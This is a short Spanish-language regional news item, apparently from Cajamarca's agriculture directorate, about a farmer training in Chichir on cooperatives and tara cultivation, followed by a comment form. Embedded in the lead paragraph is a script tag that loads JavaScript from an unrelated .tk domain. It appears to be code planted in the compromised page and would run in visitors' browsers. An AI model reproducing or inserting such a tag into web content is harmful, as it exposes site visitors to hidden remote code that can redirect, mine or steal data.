Ingresar

DRAC CAPACITA A CAMPESINOS DE CHICHIR EN ASOCIATIVIDAD

Viernes, 13 Abril, 2018 - 10:38
También trataron sobre producción y cuidado de la tara. Acción se realiza en coordinación con las instituciones de Cajabamba y del distrito de Condebamba. <script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

La Dirección Regional de Agricultura Cajamarca, a través Agencia Agraria de Cajabamba, en coordinación con las instituciones públicas como Serfor, Senasa, Municipalidad Distrital de Condebamba, realizó un taller de capacitación en el caserío Chichir a los productores, agricultores y campesinos de esa jurisdicción.

El director de la Agencia Agraria de Cajabamba, Luis Tirado Tirado, manifestó que esta importante capacitación trató sobre asociatividad y modelo de cooperativismo y control de plagas y enfermedades en la cadena productiva de tara.

En otro momento, Tirado Tirado dijo que el equipo técnico de la Agencia Agraria, en coordinación con las instituciones, “se compromete con nuestros hermanos productores de Chichir para instalar un vivero, donde se producirá plantones de tara”.

Finalmente refirió que seguirán “trabajando en coordinación con las instituciones con el objetivo de mejorar los ingresos económicos de las familias cajabambinas, ya que juntos construimos una gran región”.

AdjuntoTamaño
PDF icon descargue208.84 KB

Añadir nuevo comentario

Ingrese una dirección de correo electrónico válida

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
CAPTCHA de imagen
Introduzca los caracteres que aparecen en la imagen